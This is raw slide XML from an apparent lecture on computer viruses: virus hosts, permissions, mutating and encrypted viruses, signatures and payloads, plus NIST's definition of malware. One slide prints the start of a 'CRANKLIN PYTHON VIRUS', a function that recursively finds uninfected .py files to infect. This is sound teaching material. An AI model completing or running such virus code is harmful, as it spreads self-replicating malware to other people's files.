            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="8701" t="6955" r="8999" b="44791"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="8335541" cy="6324600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161065392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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>A computer virus is a malicious piece of executable code that propagates typically by attaching itself to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> that will generally be an executable file </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Typical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> for computer viruses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>are</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Executable files (such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>.exe’ files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>in Windows) that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>may be sent around as email attachments </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Boot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>sectors of disk partitions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>files for system administration (such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>batch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>files in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Windows, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>shell script files in Unix, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>.) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Documents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>that are allowed to contain macros (such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>documents, Excel spreadsheets, Access database files, etc.) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Any operating system that allows third-party programs to run can support viruses </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1209392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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Because of the way </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>permissions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> work in Unix/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Linux, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>it is more difficult for a virus to wreak havoc in such machines. Let’s say that a virus embedded itself into one of your script files. The virus code will execute only with the permissions that are assigned to you. For example, if you do not have the permission to read or modify a certain system file, the virus code will, in general, be constrained by the same restriction </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>have a multi-level organization of permissions. For example, you can be an administrator with all possible privileges or you can be just a user with more limited privileges. But it is fairly common for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>owners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>leave them running in the “administrator” mode. That is, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>most owners of Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>have only one account on their machines and that will be the account with administrator privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>However, this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>does not happen in Unix/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2348390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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>At the least, a virus will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>duplicate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> itself when it attaches itself to another host document, that is, to another executable file. But the important thing to note is that this copy does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> have to be an exact replica of itself. In order to make more difficult the detection by pattern matching, the virus may alter itself when it propagates from host to host. In most cases, the changes made to the viral code are simple, such as rearrangement of the order independent instructions, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.  Viruses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that are capable of changing themselves are called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mutating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> viruses </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Computer viruses need to know if a potential host is already infected, since otherwise the size of an infected file could grow without bounds through repeated infection. Viruses typically place a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (such as a string that is an impossible date) at a specific location in the file for this purpose </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3155149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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Most commonly, the execution of a particular instance of a virus (in a specific host file) will come to an end when the host file has finished execution. However, it is possible for a more vicious virus to create a continuously running program in the background </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>To escape detection, the more sophisticated viruses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>encrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>themselves </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>with keys that change with each infection. What stays constant in such viruses is the decryption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>routine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>part of a virus is that portion of the code that is not related to propagation or concealment </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4193157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 in Python (1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#!/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/python </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>os</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smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>datetime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smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SIGNATURE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= "CRANKLIN PYTHON VIRUS" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>search(path):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filestoinfect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= []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filelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>os.listdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(path)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for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>filelist</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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>os.path.isdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(path+"/"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a: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filestoinfect.extend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(search(path+"/"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> # recursive</a:t>
            </a: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elif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[-3:] == ".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>py</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infected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= False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for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>line in open(path+"/"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fname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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SIGNATURE in line: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infected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= True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break </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>     if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>infected == False: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filestoinfect.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(path+"/"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fname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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>filestoin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2008324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dirty="0" smtClean="0">
                <a:latin typeface="Comic Sans MS" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Malware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3075" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Comic Sans MS" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NIST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>defines malware as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>    “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>a program that is inserted into a system, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>usually covertly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>intent of compromising the confidentiality, integrity, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>or availability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>of the victim’s data, applications, or operating system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>or otherwise </a:t>
            </a:r>
            <a:r>
